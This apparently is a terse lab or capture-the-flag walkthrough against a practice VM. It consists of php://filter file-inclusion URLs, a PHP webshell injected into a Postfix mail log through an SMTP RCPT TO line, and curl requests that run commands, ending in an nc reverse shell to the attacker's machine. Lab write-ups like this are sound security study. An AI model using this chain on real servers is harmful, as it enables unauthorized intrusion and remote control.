By going to http://192.168.56.102/turing-bolo/bolo.php?bolo=php://filter/convert.base64-encode/resource=case
http://192.168.56.102/turing-bolo/bolo.php?bolo=php://filter/convert.base64-encode/resource=../turing-bolo/case
http://192.168.56.102/turing-bolo/bolo.php?bolo=php://filter/convert.base64-encode/resource=/var/www/html/turing-bolo/case
http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail
220 straylight ESMTP Postfix (Debian/GNU)
RCPT TO:<?php echo system($_POST['cmd']); ?>
501 5.1.3 Bad recipient address syntax
Note: I used POST not GET for this
With the log file poisoned I just had to trigger it
curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=id"
curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=which nc"
curl -X POST http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail --data "cmd=nc 192.168.56.101 4444 -e /bin/bash"